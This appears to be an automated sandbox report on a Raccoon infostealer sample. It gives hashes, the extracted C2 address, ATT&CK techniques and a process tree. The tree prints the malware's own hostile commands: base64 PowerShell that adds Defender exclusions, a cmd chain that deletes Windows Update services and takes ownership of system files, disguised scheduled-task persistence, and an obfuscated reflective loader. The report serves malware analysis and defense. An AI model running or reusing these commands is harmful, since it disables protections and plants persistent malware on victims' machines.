raccoon | 36bd02986dce2eed41c7de5ba2fad40054dc7c3afa853837eca3e5aec8c97cd0

Analysis

max time kernel
83s
max time network
61s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
29-08-2022 19:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44d537a1177052bda245325ade50bc0c.exe
Size

1.7MB
MD5

44d537a1177052bda245325ade50bc0c
SHA1

30e0f857a99fb9dbae1089d27b5b93684f27db40
SHA256

36bd02986dce2eed41c7de5ba2fad40054dc7c3afa853837eca3e5aec8c97cd0
SHA512

d370cdbd0f8197a24bb8664ab99058424bcf0ca251cb0b363fc8964f19ba81d7dedad9777f04a09e11d319573d4b7d51534379a335b6cf4f6650aa0ab84468be
SSDEEP

24576:cErC3wTvofxmxKvKwjUWlq5Qmt1GZ5Ucq1DmE8ctw/idkxChx4Q:HrcagfxWvv59bGz8mEq/iWxChxd

Score

10^/10

raccoon 94476028cb01373a9a79593d7fce091e agilenet discovery evasion exploit spyware stealer

Malware Config

Extracted

Family

raccoon

Botnet

94476028cb01373a9a79593d7fce091e

http://185.225.17.198

rc4.plain

Signatures

Modifies security service 2 TTPs 2 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security	reg.exe

Raccoon
Raccoon is an infostealer written in C++ and first seen in 2019.
stealer raccoon
Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

conhost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts conhost.exe
Executes dropped EXE 4 IoCs

Processes:

L0g83Hu6.exebgVUh3Ro.execonhost.exeupdate.exe

pid process

1724 L0g83Hu6.exe
1832 bgVUh3Ro.exe
1396 conhost.exe
1260 update.exe
Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

1360 takeown.exe
944 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Loads dropped DLL 6 IoCs

Processes:

MSBuild.exetaskeng.exe

pid process

780 MSBuild.exe
780 MSBuild.exe
780 MSBuild.exe
780 MSBuild.exe
780 MSBuild.exe
1764 taskeng.exe
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

1360 takeown.exe
944 icacls.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

pid	process
1724	L0g83Hu6.exe
1832	bgVUh3Ro.exe
1396	conhost.exe
1260	update.exe

pid	process
1360	takeown.exe
944	icacls.exe

pid	process
780	MSBuild.exe
780	MSBuild.exe
780	MSBuild.exe
780	MSBuild.exe
780	MSBuild.exe
1764	taskeng.exe

pid	process
1360	takeown.exe
944	icacls.exe

Obfuscated with Agile.Net obfuscator 1 IoCs

Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

agilenet

Processes:

resource	yara_rule
behavioral1/memory/1972-54-0x0000000000AD0000-0x0000000000C7E000-memory.dmp	agile_net

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

L0g83Hu6.exe

pid process

1724 L0g83Hu6.exe
1724 L0g83Hu6.exe

pid	process
1724	L0g83Hu6.exe
1724	L0g83Hu6.exe

Suspicious use of SetThreadContext 2 IoCs

Processes:

44d537a1177052bda245325ade50bc0c.execonhost.exe

description	pid	process	target process
PID 1972 set thread context of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1688 set thread context of 1396	1688	conhost.exe	conhost.exe

Drops file in Program Files directory 2 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Program Files\Platform\Defender\update.exe	conhost.exe
File opened for modification	C:\Program Files\Platform\Defender\update.exe	conhost.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

1572 sc.exe
1744 sc.exe
1504 sc.exe
1648 sc.exe
888 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exe

pid process

1636 schtasks.exe
916 schtasks.exe

pid	process
1572	sc.exe
1744	sc.exe
1504	sc.exe
1648	sc.exe
888	sc.exe

pid	process
1636	schtasks.exe
916	schtasks.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 80853c43eebbd801	powershell.EXE

Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

1124 reg.exe
1696 reg.exe
1476 reg.exe
2032 reg.exe
1332 reg.exe
1648 reg.exe
1060 reg.exe
2036 reg.exe
1732 reg.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exeL0g83Hu6.exepowershell.execonhost.exepowershell.EXE

pid process

1516 powershell.exe
1724 L0g83Hu6.exe
1420 powershell.exe
1688 conhost.exe
1724 powershell.EXE

pid	process
1124	reg.exe
1696	reg.exe
1476	reg.exe
2032	reg.exe
1332	reg.exe
1648	reg.exe
1060	reg.exe
2036	reg.exe
1732	reg.exe

pid	process
1516	powershell.exe
1724	L0g83Hu6.exe
1420	powershell.exe
1688	conhost.exe
1724	powershell.EXE

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

44d537a1177052bda245325ade50bc0c.exepowershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.execonhost.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	1972	44d537a1177052bda245325ade50bc0c.exe
Token: SeDebugPrivilege	1516	powershell.exe
Token: SeDebugPrivilege	1420	powershell.exe
Token: SeShutdownPrivilege	1532	powercfg.exe
Token: SeShutdownPrivilege	1332	powercfg.exe
Token: SeShutdownPrivilege	1816	powercfg.exe
Token: SeShutdownPrivilege	1828	powercfg.exe
Token: SeTakeOwnershipPrivilege	1360	takeown.exe
Token: SeDebugPrivilege	1688	conhost.exe
Token: SeDebugPrivilege	1724	powershell.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

44d537a1177052bda245325ade50bc0c.exeMSBuild.exeL0g83Hu6.exebgVUh3Ro.execonhost.execmd.execmd.exe

description	pid	process	target process
PID 1972 wrote to memory of 1516	1972	44d537a1177052bda245325ade50bc0c.exe	powershell.exe
PID 1972 wrote to memory of 1516	1972	44d537a1177052bda245325ade50bc0c.exe	powershell.exe
PID 1972 wrote to memory of 1516	1972	44d537a1177052bda245325ade50bc0c.exe	powershell.exe
PID 1972 wrote to memory of 1516	1972	44d537a1177052bda245325ade50bc0c.exe	powershell.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 1972 wrote to memory of 780	1972	44d537a1177052bda245325ade50bc0c.exe	MSBuild.exe
PID 780 wrote to memory of 1724	780	MSBuild.exe	L0g83Hu6.exe
PID 780 wrote to memory of 1724	780	MSBuild.exe	L0g83Hu6.exe
PID 780 wrote to memory of 1724	780	MSBuild.exe	L0g83Hu6.exe
PID 780 wrote to memory of 1724	780	MSBuild.exe	L0g83Hu6.exe
PID 1724 wrote to memory of 1636	1724	L0g83Hu6.exe	schtasks.exe
PID 1724 wrote to memory of 1636	1724	L0g83Hu6.exe	schtasks.exe
PID 1724 wrote to memory of 1636	1724	L0g83Hu6.exe	schtasks.exe
PID 1724 wrote to memory of 1636	1724	L0g83Hu6.exe	schtasks.exe
PID 1724 wrote to memory of 668	1724	L0g83Hu6.exe	schtasks.exe
PID 1724 wrote to memory of 668	1724	L0g83Hu6.exe	schtasks.exe
PID 1724 wrote to memory of 668	1724	L0g83Hu6.exe	schtasks.exe
PID 1724 wrote to memory of 668	1724	L0g83Hu6.exe	schtasks.exe
PID 780 wrote to memory of 1832	780	MSBuild.exe	bgVUh3Ro.exe
PID 780 wrote to memory of 1832	780	MSBuild.exe	bgVUh3Ro.exe
PID 780 wrote to memory of 1832	780	MSBuild.exe	bgVUh3Ro.exe
PID 780 wrote to memory of 1832	780	MSBuild.exe	bgVUh3Ro.exe
PID 1832 wrote to memory of 1688	1832	bgVUh3Ro.exe	conhost.exe
PID 1832 wrote to memory of 1688	1832	bgVUh3Ro.exe	conhost.exe
PID 1832 wrote to memory of 1688	1832	bgVUh3Ro.exe	conhost.exe
PID 1832 wrote to memory of 1688	1832	bgVUh3Ro.exe	conhost.exe
PID 1688 wrote to memory of 1420	1688	conhost.exe	powershell.exe
PID 1688 wrote to memory of 1420	1688	conhost.exe	powershell.exe
PID 1688 wrote to memory of 1420	1688	conhost.exe	powershell.exe
PID 1688 wrote to memory of 1032	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 1032	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 1032	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 1612	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 1612	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 1612	1688	conhost.exe	cmd.exe
PID 1032 wrote to memory of 888	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 888	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 888	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1572	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1572	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1572	1032	cmd.exe	sc.exe
PID 1612 wrote to memory of 1532	1612	cmd.exe	powercfg.exe
PID 1612 wrote to memory of 1532	1612	cmd.exe	powercfg.exe
PID 1612 wrote to memory of 1532	1612	cmd.exe	powercfg.exe
PID 1032 wrote to memory of 1744	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1744	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1744	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1504	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1504	1032	cmd.exe	sc.exe
PID 1032 wrote to memory of 1504	1032	cmd.exe	sc.exe
PID 1612 wrote to memory of 1332	1612	cmd.exe	powercfg.exe
PID 1612 wrote to memory of 1332	1612	cmd.exe	powercfg.exe
PID 1612 wrote to memory of 1332	1612	cmd.exe	powercfg.exe
PID 1688 wrote to memory of 572	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 572	1688	conhost.exe	cmd.exe
PID 1688 wrote to memory of 572	1688	conhost.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\44d537a1177052bda245325ade50bc0c.exe
"C:\Users\Admin\AppData\Local\Temp\44d537a1177052bda245325ade50bc0c.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1972

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc UwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMgAwAA==
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1516

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:780

C:\Users\Admin\AppData\Roaming\L0g83Hu6.exe
"C:\Users\Admin\AppData\Roaming\L0g83Hu6.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1724

C:\Windows\SysWOW64\schtasks.exe
/C /create /F /sc minute /mo 5 /tn "Search and Cortana application{G4H5J6K3B2J5G8S4-A7X2V6N9M4D3-L3K7V7C3X6Z1}" /tr "C:\Users\Admin\AppData\Roaming\Windows\Cortana\SearchUI.exe"
4⤵
- Creates scheduled task(s)
PID:1636

C:\Windows\SysWOW64\schtasks.exe
/C /Query /XML /TN "Search and Cortana application{G4H5J6K3B2J5G8S4-A7X2V6N9M4D3-L3K7V7C3X6Z1}"
4⤵
PID:668

C:\Users\Admin\AppData\Roaming\bgVUh3Ro.exe
"C:\Users\Admin\AppData\Roaming\bgVUh3Ro.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1832

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\bgVUh3Ro.exe"
4⤵
- Drops file in Drivers directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1420

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
- Suspicious use of WriteProcessMemory
PID:1032

C:\Windows\system32\sc.exe
sc stop UsoSvc
6⤵
- Launches sc.exe
PID:888

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
6⤵
- Launches sc.exe
PID:1572

C:\Windows\system32\sc.exe
sc stop wuauserv
6⤵
- Launches sc.exe
PID:1744

C:\Windows\system32\sc.exe
sc stop bits
6⤵
- Launches sc.exe
PID:1504

C:\Windows\system32\sc.exe
sc stop dosvc
6⤵
- Launches sc.exe
PID:1648

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
6⤵
- Modifies registry key
PID:1060

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
6⤵
- Modifies registry key
PID:1124

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
6⤵
- Modifies security service
- Modifies registry key
PID:2036

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
6⤵
- Modifies registry key
PID:1732

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
6⤵
- Modifies registry key
PID:1696

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1360

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
6⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:944

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1476

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:2032

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1332

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
6⤵
- Modifies registry key
PID:1648

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
6⤵
PID:1564

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
6⤵
PID:668

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
6⤵
PID:1828

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
6⤵
PID:896

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
6⤵
PID:976

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
6⤵
PID:1100

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
6⤵
PID:1628

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1532

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1332

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
5⤵
PID:572

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "WindowsDefender" /tr "\"C:\Program Files\Platform\Defender\update.exe\""
6⤵
- Creates scheduled task(s)
PID:916

C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
5⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:1396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /run /tn "WindowsDefender"
5⤵
PID:1264

C:\Windows\system32\schtasks.exe
schtasks /run /tn "WindowsDefender"
6⤵
PID:808

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Roaming\bgVUh3Ro.exe"
5⤵
PID:1624

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
6⤵
PID:920

C:\Windows\system32\taskeng.exe
taskeng.exe {3E534378-AFB4-4A15-987B-5CAE27BBE677} S-1-5-18:NT AUTHORITY\System:Service:
1⤵
- Loads dropped DLL
PID:1764

C:\Program Files\Platform\Defender\update.exe
"C:\Program Files\Platform\Defender\update.exe"
2⤵
- Executes dropped EXE
PID:1260

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"
3⤵
PID:708

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1724

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1588

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{e761222c-c382-4cef-af4c-c57875b5a7f8}
1⤵
PID:1760

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{dbb566e9-f381-4137-a81a-46e1d0babef3}
1⤵
PID:1888

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Impair Defenses

T1562

File Permissions Modification

T1222

Credential Access

Credentials in Files

T1081

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Platform\Defender\update.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Users\Admin\AppData\Roaming\L0g83Hu6.exe
Filesize
6.0MB

MD5
8ad7ebbbf5a304600fff6fd8b1e77a74

SHA1
88ae13dfbc5a2fb9fea8098baff0482c2ceb97e3

SHA256
cf9f6cd9abcd19d7aa618e12c9f599989e451f602d69cee6947638c4b138c009

SHA512
9172888a4b21f05aad4ec01c2e58bf6c768ea3d54b74daf432aeccf160d8435704a888130d59b785c79ba8daa2099b52769cc44223988a0d426fcb728793fdc5

Download Submit
C:\Users\Admin\AppData\Roaming\L0g83Hu6.exe
Filesize
6.0MB

MD5
8ad7ebbbf5a304600fff6fd8b1e77a74

SHA1
88ae13dfbc5a2fb9fea8098baff0482c2ceb97e3

SHA256
cf9f6cd9abcd19d7aa618e12c9f599989e451f602d69cee6947638c4b138c009

SHA512
9172888a4b21f05aad4ec01c2e58bf6c768ea3d54b74daf432aeccf160d8435704a888130d59b785c79ba8daa2099b52769cc44223988a0d426fcb728793fdc5

Download Submit
C:\Users\Admin\AppData\Roaming\bgVUh3Ro.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
C:\Users\Admin\AppData\Roaming\bgVUh3Ro.exe
Filesize
5.1MB

MD5
2438b851e157a3f70bd48af1984b2139

SHA1
105ce31ecdce604bf8629ddc6580f2ad25fc21b5

SHA256
bada6d6d493416c0992a375de60fe574ced09bef5496ebfac07c19a8b2785494

SHA512
ff1ba2eee03a981744434984d431f022afee988745a54d268c39df258502ba57d9880c916050370e351a709ab42928c0a7c3665a7b80b384e9832841e3d76c52

Download Submit
